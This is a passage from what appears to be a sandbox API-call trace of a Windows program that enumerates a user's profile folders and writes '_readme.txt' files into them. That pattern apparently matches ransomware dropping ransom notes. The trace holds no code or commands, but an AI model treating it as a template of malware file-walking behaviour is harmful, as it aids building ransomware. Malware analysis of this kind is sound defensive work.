dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.291] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b06900, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.291] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.291] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.291] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.298] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.298] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.298] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.298] PathFindFileNameW (pszPath="") returned="" [0097.298] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.299] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.299] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.299] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fb10 | out: hHeap=0x630000) returned 1 [0097.299] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0097.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fb10 | out: hHeap=0x630000) returned 1 [0097.301] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0097.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.302] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.302] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fb10 | out: hHeap=0x630000) returned 1 [0097.302] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.302] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0097.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x332fde8 [0097.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0097.302] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.302] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318be0 | out: hHeap=0x630000) returned 1 [0097.302] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0097.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318d98 | out: hHeap=0x630000) returned 1 [0097.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338fa8 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0097.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318be0 | out: hHeap=0x630000) returned 1 [0097.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce7b8 | out: hHeap=0x630000) returned 1 [0097.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3331b88 | out: hHeap=0x630000) returned 1 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318d98 | out: hHeap=0x630000) returned 1 [0097.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0097.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318d40 | out: hHeap=0x630000) returned 1 [0097.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318be0 | out: hHeap=0x630000) returned 1 [0097.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0097.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318d98 | out: hHeap=0x630000) returned 1 [0097.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8926dae0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8926dae0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318298 | out: hHeap=0x630000) returned 1 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce7b8 | out: hHeap=0x630000) returned 1 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318be0 | out: hHeap=0x630000) returned 1 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0097.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318d98 | out: hHeap=0x630000) returned 1 [0097.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fd3f350, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fd3f350, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318d98 | out: hHeap=0x630000) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0097.306] RtlAllocateHeap 